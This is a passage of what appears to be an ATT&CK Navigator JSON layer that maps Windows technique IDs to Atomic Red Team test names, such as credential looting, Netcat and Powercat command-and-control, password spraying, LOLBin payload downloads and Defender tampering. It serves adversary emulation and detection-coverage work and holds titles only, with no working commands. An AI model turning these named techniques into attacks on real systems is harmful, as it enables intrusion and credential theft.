account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD 